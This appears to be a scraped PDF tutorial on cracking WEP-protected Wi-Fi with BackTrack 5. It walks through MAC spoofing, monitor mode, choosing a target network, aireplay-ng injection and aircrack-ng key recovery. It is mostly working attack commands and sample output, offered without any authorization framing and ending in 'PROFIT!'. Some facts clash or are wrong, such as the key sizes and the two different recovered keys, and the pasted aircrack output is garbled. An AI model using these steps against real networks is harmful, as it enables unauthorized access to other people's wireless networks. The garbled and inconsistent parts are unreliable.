We P Cracking

Download as pdf or txt
Download as pdf or txt
You are on page 1of 2

WEP Cracking

Using BackTrack 5 Download BackTrack 5 KDE 64-bit ISO http://www.backtrack-linux.org/backtrack/backtrack-5-release/ Create a bootable USB drive with UNetbootin http://unetbootin.sourceforge.net/ Reboot the compute with the USB drive inserted, make sure that the BIOS is set to boot from USB devices before HDD/Optical Drive Boot into Ubuntu. Delete the kcache files for startx may fail to load cd /root/.kde/ find . -type f -iname "*.kcache" -delete startx Open a new Konsole window. Obtain the network interface %INTERFACE% airmon-ng Set the network interface to monitor mode, spoof the interface MAC airmon-ng stop %INTERFACE% ifconfig %INTERFACE% down macchanger --mac 00:11:22:33:44:55 %INTERFACE% airmon-ng start %INTERFACE% Pick a target network. Take note of the access point human-readable name %ESSID%, access point MAC address %BSSID% and access point channel %CHANNEL%. airodump-ng %INTERFACE% Start monitoring the target network airodump-ng -c %CHANNEL% -w capturedata --bssid %BSSID% %INTERFACE% Open a new Konsole window. Associate the interface with the access point. A successful injection looks like: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-) aireplay-ng -1 0 -a %BSSID% -h 00:11:22:33:44:55 -e %ESSID% %INTERFACE% Keep sending a handshake packet to maintain the association. aireplay-ng -1 6000 -o 1 -q 10 -e %ESSID% -a %BSSID% -h 00:11:22:33:44:55 ath0 Open a new Konsole window. Create router traffic and start capturing packets. It will start capturing ARP requests and send packets at upwards of 500 per second. aireplay-ng -3 -b %BSSID% -h 00:11:22:33:44:55 %INTERFACE% Continue capturing packets for a while. An estimate 250,000 IVs are required for a 32-bit key and 1,500,000 IVs for a

64-bit key. Success was had after about 1.3M packets were received on a testing target. After enough packets have been captured open up a new Konsole window and decode the WEP key. aircrack-ng -b %BSSID% *.cap (Alternately try the FMS/Korek method) aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap If not successful, spend more time capturing packets. A successful attack looks like:
Aircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs) KB 0 1 2 3 depth 0/ 9 0/ 8 0/ 2 1/ 5 byte(vote) 12( 15) F9( 34( 61) E8( 56( 87) A6( 78( 43) 1A(

15) 27) 63) 20)

47( E0( 15( 9B(

12) 24) 17) 20)

F7( 06( 02( 4B(

12) 18) 15) 17)

FE( 3B( 6B( 4A(

12) 16) 15) 16)

1B( 4E( E0( 2B(

5) 15) 15) 15)

77( E1( AB( 4D(

5) 15) 13) 15)

A5( 2D( 0E( 58(

3) 13) 10) 15)

F6( 89( 17( 6A(

3) 12) 10) 15)

03( E4( 27( 7C(

0) 12) 10) 15)

KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%

??? PROFIT!
SSID: firefly WEP KEY: AF1B08A3E0

You might also like